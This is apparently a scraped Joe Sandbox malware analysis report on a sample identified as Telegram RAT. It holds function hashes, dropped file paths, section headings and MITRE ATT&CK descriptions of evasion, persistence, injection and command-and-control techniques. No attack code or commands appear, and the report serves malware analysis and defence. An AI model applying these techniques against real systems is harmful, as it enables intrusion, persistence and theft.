Instruction Fuzzy Hash: C9E08C20B0DD0F4FD998F61C406A23D62C2FBA8681F580135C41DC3696DF98AC124796

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B76A80 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5593a0c5e88470476f863ade10e61fab90d1b257f764fa5b0d29645afb89a6d
Instruction ID: 8440279b85b3b5560d0fa30aa4ead31105221d5d21b9ef8a03f907a4f6b5559f
Opcode Fuzzy Hash: d5593a0c5e88470476f863ade10e61fab90d1b257f764fa5b0d29645afb89a6d
Instruction Fuzzy Hash: 83D05B20B10D0D4B9B4CB52D444C430B3D1E76420279442699406C6291DD25D8C58745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B78148 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 993da19fbb060a5342817d5589c6d7da5c22009fc4f1d745110390366522995f
Instruction ID: 62037bffa210f1a4b20fc0809210ab599e0402d5bb3e4441b2dad9b9470a2c22
Opcode Fuzzy Hash: 993da19fbb060a5342817d5589c6d7da5c22009fc4f1d745110390366522995f
Instruction Fuzzy Hash: 9BE08652E2D7C65FE24AB764083167666D19F4A690F4905FDC08EC75C3DE0C5848924E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9NBx4Vmiuj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\btjxg.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9NBx4Vmiuj.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0fv5l1q.20e.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brnwyzyn.tpv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuq2bxmg.oo1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkat1zxr.vdv.ps1

Windows Analysis Report
9NBx4Vmiuj.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre